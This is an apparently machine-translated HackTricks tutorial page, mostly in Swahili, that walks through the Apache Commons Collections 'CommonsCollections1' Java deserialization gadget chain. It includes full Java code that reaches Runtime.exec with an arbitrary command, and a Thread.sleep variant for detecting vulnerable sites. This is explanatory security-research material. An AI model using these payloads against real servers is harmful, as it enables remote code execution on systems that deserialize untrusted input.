CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Java Transformers to Rutime exec()

Katika maeneo kadhaa unaweza kupata payload ya java deserialization inayotumia transformers kutoka kwa Apache common collections kama ifuatavyo:

import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1PayloadOnly {
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);

//Execute gadgets
lazyMap.get("anything");
}
}

Ikiwa hujui chochote kuhusu java deserialization payloads inaweza kuwa ngumu kuelewa kwa nini hii code itatekeleza calc.

Kwanza kabisa unahitaji kujua kwamba Transformer katika Java ni kitu ambacho kinapokea darasa na kikibadilisha kuwa tofauti. Pia ni muhimu kujua kwamba payload inayotekelezwa hapa ni sawa na:

Runtime.getRuntime().exec(new String[]{"calc.exe"});

Au kwa usahihi zaidi, kile kitakachotekelezwa mwishoni ni:

((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});

Jinsi

Hivyo, jinsi payload ya kwanza inavyowasilishwa ni sawa na zile "rahisi" one-liners?

Kwanza kabisa, unaweza kuona katika payload kwamba mnyororo (array) wa mabadiliko umeundwa:

String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
//(1) - Get gadget Class (from Runtime class)
new ConstantTransformer(Runtime.class),

//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
),

//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
),

//(4) - Use the Runtime object to call exec with arbitrary commands
new InvokerTransformer("exec",
new Class[]{String.class},
command
)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

Ikiwa utasoma msimbo, utaona kwamba ikiwa kwa namna fulani unachanganya mabadiliko ya array, unaweza kuwa na uwezo wa kutekeleza amri zisizo na mipaka.

Hivyo, mabadiliko hayo yanachanganywa vipi?

Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");

Katika sehemu ya mwisho ya payload unaweza kuona kwamba kitu cha Ramani kinaundwa. Kisha, kazi decorate inatekelezwa kutoka LazyMap na kitu cha ramani na waongofu waliounganishwa. Kutoka kwa msimbo ufuatao unaweza kuona kwamba hii itasababisha waongofu waliounganishwa kunakiliwa ndani ya sifa ya lazyMap.factory:

protected LazyMap(Map map, Transformer factory) {
super(map);
if (factory == null) {
throw new IllegalArgumentException("Factory must not be null");
}
this.factory = factory;
}

Na kisha hitimisho kubwa linafanyika: lazyMap.get("anything");

Hii ni nambari ya kazi ya get:

public Object get(Object key) {
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}

Na hii ni nambari ya kazi ya transform

public Object transform(Object object) {
for (int i = 0; i < iTransformers.length; i++) {
object = iTransformers[i].transform(object);
}
return object;
}

Hivyo, kumbuka kwamba ndani ya factory tulikuwa tumehifadhi chainedTransformer na ndani ya transform kazi tunapitia mabadiliko yote yaliyofungamana na kutekeleza moja baada ya nyingine. Jambo la kufurahisha ni kwamba kila transformer inatumia object kama ingizo na object ni matokeo kutoka kwa transformer ya mwisho iliyotekelezwa. Hivyo, mabadiliko yote yanatekelezwa kwa kufungamana yanatekeleza payload mbaya.

Muhtasari

Mwisho, kutokana na jinsi lazyMap inavyosimamia transformers zilizofungamana ndani ya njia ya kupata, ni kana kwamba tunatekeleza msimbo ufuatao:

Object value = "someting";

value = new ConstantTransformer(Runtime.class).transform(value); //(1)

value = new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", null}
).transform(value); //(2)

value = new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
).transform(value); //(3)

value = new InvokerTransformer("exec",
new Class[]{String.class},
command
).transform(value); //(4)

Note jinsi value ni ingizo la kila mabadiliko na matokeo ya mabadiliko ya awali, ikiruhusu utekelezaji wa mstari mmoja:

((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});

Note that here it ilielezwa gadgets used for the ComonsCollections1 payload. But it's left jinsi hii yote inaanza kutekelezwa. You can see here that ysoserial, in order to execute this payload, uses an AnnotationInvocationHandler object because wakati huu object inapata deserialized, it will invoke the payload.get() function that will tekeleza payload yote.

Java Thread Sleep

This payload could be muhimu kubaini kama wavuti ina udhaifu kwani itatekeleza usingizi ikiwa ina.

import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1Sleep {
public static void main(String... args) {
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Thread.class),
new InvokerTransformer("getMethod",
new Class[]{
String.class, Class[].class
},
new Object[]{
"sleep", new Class[]{Long.TYPE}
}),
new InvokerTransformer("invoke",
new Class[]{
Object.class, Object[].class
}, new Object[]
{
null, new Object[] {7000L}
}),
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);

//Execute gadgets
lazyMap.get("anything");

}
}

Vifaa Vingine

Unaweza kupata vifaa zaidi hapa: https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousPHP - Deserialization + Autoload Classes NextBasic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)

Last updated 4 months ago